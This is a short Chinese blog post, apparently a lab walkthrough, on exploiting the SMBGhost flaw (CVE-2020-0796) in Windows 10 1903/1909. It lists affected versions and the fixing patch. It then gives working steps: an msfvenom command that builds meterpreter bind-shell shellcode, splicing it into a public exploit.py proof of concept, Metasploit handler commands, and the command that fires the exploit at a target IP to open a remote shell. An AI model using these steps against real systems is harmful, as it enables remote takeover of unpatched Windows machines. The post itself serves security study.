漏洞-Windows-CVE-2020-0796

环境:

目标:192.168.107.74,windows10专业版 1903

攻击者:192.168.103.61

SMBGhost_RCE_PoC

影响版本:

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

对应补丁

KB4551762

第一步:

使用MSF生成python版本反弹的shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp lport=2006 -f py -o evil.py

第二步:

将evil.py脚本中的payload替换掉SMBGhost_RCE_PoC文件夹下,exploit.py中的USER_PAYLOAD部分;同时用MSF开启正向监听:

use  exploit/multi/handler
set  payload windows/x64/meterpreter/bind_tcp
set rhost  192.168.107.74
set  lport 2006
run

第三步:

#攻击,脚本打开目标2006端口,从而msf能连上去。
python3  exploit.py  -ip 192.168.107.74

#遇到的小问题:当环境处于无线局域网,会一直报socket超时错误,当环境处于有线局域网,则正常。

m/2020/06/12/

本地提权

批量检测

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值